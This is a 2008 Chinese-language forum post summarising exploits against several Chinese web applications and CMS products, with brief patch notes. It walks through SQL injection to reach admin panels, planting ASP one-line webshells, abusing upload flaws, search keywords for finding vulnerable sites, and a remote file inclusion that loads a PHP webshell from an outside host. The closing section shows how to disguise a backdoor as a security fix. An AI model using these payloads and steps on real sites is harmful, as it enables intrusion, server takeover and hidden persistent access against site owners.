|
|
常见漏洞和利用方法 及修补方案总结BY阿狼
1.尘缘雅境图文系统 v3.0 build 20030123(其实在v0.45也可以的)
漏洞页面:createasp.asp和lastnewsxp.asp
通过注入登陆后台,发布一篇文章在文章标题和内容那里填上我们的一句话<%execute request(\"value\")%>
然后执行 url/admin/createasp.asp(返回正常,提示asp调用成功)
url/admin/createasp.asp(返回错误,我们插了马当然了)
漏洞修补:我不知道怎么修补~~官方已经发了补丁了~~
还有 沸腾3AS流浪尘缘新闻系统 v0.45 Finish 完整版存在注入漏洞,但是这个注入漏洞要注册用户才能访问!
所以如果关闭了用户注册就没折了~~~
应用方法:直接注册个用户,然后随便在首页找个文章记下他的id,然后访问http://XXXX.XXXX.com/textbox.asp?action=modify&;newsid=刚
才记下的id号!这个页面是有注入漏洞的,很容易手动猜解!得到账号和密码后进入后台在网站配置信息处(留言本屏蔽词语)写上“一句话”
然后连接http://website/inc/config.asp,那么shell就拿到了!
然后用一句话客户端连接http://url/admin/createasp.asp
漏洞修补:textbox.asp在代码14-30行
<%
Dim action,newsID,rs,Content
dim sql
dim conn
Action=LCase(Request.QueryString(\"Action\"))
newsID=Request.QueryString(\"newsID\")
If request(\"action\")=\"modify\" Then
set rs=server.createobject(\"adodb.recordset\")
sql=\"select * from news where newsid=\"&newsid
rs.open sql,conn,1,1
If Not rs.Eof Then
Content=rs(\"Content\")
End If
Response.Write Content
End If
%>
增加个过滤语句就ok了,把那些文件扩展名过滤就ok了~~~~我就不多说了,在说我没有学asp比较不熟悉
2.旧漏洞/user/Upload.asp?dialogtype=UserBlogPic&size=5 (但还有很多没有打补丁)
在百度里高级搜索搜索(别忘了点UL中查询......). Reg/User_Reg.asp --注册界面 注册一个***.asp 格式的用户名
然后找个可以传图片的点发,图片中插入代码一句话 木马代码插入,找个空行空位置插入代码<%eval request(\"haier\")%>
用一句话客户端连接就哦了!
3.情网交友系统上传漏洞
漏洞文件/admin/upload_file.asp 和动网upfile.asp漏洞原理一样
摆渡搜索关键字:同城约会 贺卡传情 情感随笔 热门投票
先检测下漏洞存在:http://website/admin/upload_file.asp ; 返回显示:
Microsoft VBScript 运行时错误 错误 '800a01b6'
对象不支持此属性或方法: 'form'
/admin/upload_file.asp,行6
说明漏洞存在!接下来交给明小子就ok了,传上马~~~~
4.天空教室网络课堂上传漏洞(至今还很多)
(1).打开百度输入关键字:天空教室网络课堂
(2).添加漏洞文件:htmleditor/getfile.asp(没有过滤.asa 所以要把马改成asa的)
上传地址:http://website/skyclass/htmleditor/getfile.asp ; 先开WSockExpert抓包,然后传马,从WSockExpert得到后台地址。
5.SHOPEX最新漏洞利用
漏洞出现在 /shop/npsout_reply.php 和远程包含差不多
百度搜索:
关键词:产品目录 联系我们 关于我们 常见问题 安全交易 购买流程 如何付款
自己先弄一个PHP的马把后缀改成TXT 上传到空间
目标网址后面加上/shop/npsout_reply.php?INC_SYSHOMEDIR=http://www.xdhacker.cn/php/phpspy.txt
=http://www.xdhacker.cn/php/phpspy.txt是我空间自己传上去的马!
漏洞修补:可以删除shop目录下的npsout_reply.php文件
6.雷池系统上传漏洞
对于以前的版本,有漏洞'or'='or'后台漏洞,现在的最新版本没有这个漏洞,试下下载默认数据库data/nxnews.mdb密码以明文保存
的
但是这个上传漏洞适于用任何版本 后台地址admin/adminlogin.asp先看 'or'='or'后台漏洞
在网址后加admin/uploadPic.asp?actionType=mod&picName=x.asp 其中x.asp是shell的文件名
选择一个木马图片,然后按上传就可以了uppic目录下上传文件名为x.asp的文件 连接地址http://website/uppic/x.asp
这样就拿到shell了~~~
其实在admin文件夹下的uploadPic.inc.asp中,没有对访问权限进行限制,任意用户都可以访问到此文件。任意用户都可以使用此文件上传文件到服务器
漏洞修补先说明一个asp的语法
replace(str,\"a\",\"b\")
这个函数是将字符串str中的所有a转换成b
那么我们看看刚才的提交函数picName=x.asp
picName是提交的变量x.asp是它提交的数据
我们要做的就是替换掉里面的.asp什么的
好,我们就可以写成这样replace(picName,\".asp\",\".gif\")
这个函数是将字符串picName中的所有.asp转换成.gif
只替换.asp的不行啊,还有.asa的怎么办?
replace(replace(picName,\".asp\",\".gif\"),\".asa\",\".gif\")
好,看我的,其它的也这样改
replace(replace(replace(picName,\".asp\",\".gif\"),\".asa\",\".gif\"),\".cer\",\".gif\")
再替换一个.cdx
replace(replace(replace(replace(picName,\".asp\",\".gif\"),\".asa\",\".gif\"),\".cer\",\".gif\"),\".cdx\",\".gif\")
再替换%
replace(replace(replace(replace(replace(picName,\".asp\",\".gif\"),\".asa\",\".gif\"),\".cer\",\".gif\"),\".cdx\",\".gif\"),\"%\",\"\")
好,这个就是我们要的代码了
uploadPic.inc.asp修改这个文件
先看下面,没有 x.asp这个文件啊
好,大家可以看到是可以的,下面我们加上自己的代码
那么我们如何才能给自己留个后门呢
好,也很简单
再来一句asp
if request(\"act\")<>\"shell\" then
picName = replace(replace(replace(replace(replace(picName,\".asp\",\".gif\"),\".asa\",\".gif\"),\".cer\",\".gif\"),\".cdx\",\".gif\"),\"%\",\"\")
end if
这相代码意思是如果你提交的参数act的内容不是shell的话,那就执行里面的内容,哪果是shell就不执行里面的内容 好,我们将刚才的代码加上
这句是我们刚刚加的然后再将上面的语句加到原来加的地方去
好,我们再看能不能上传
这里还是x.gif,下面 我们再加个参数据看看
http://loaclhost/admin/uploadPic ... d&picName=x.asp
既然我们不能再多用参数,那我们就用能用的参数好了
picName=x.asp这个参数能用吧
if picName<>\"wolf.asp\"
picName = replace(replace(replace(replace(replace(picName,\".asp\",\".gif\"),\".asa\",\".gif\"),\".cer\",\".gif\"),\".cdx\",\".gif\"),\"%\",\"\")
end if
以上才是刚才的代码,下面我改下
这里,我们只要提交数据
http://localhost/admin/uploadPic ... mp;picName=wolf.asp
才能拿到asp的shell,下面我们再来看看
先替换代码,
我们先提交这个,看生成的是什么?
http://localhost/admin/uploadPic ... d&picName=x.asp
是图片,再来提交这个
http://localhost/admin/uploadPic ... mp;picName=wolf.asp
就会生成一个wolf.asp的文件
这样大家即可以简单的被下漏洞又可以做个简单的后门~~~ |
|
发表于 2008-10-16 19:48:57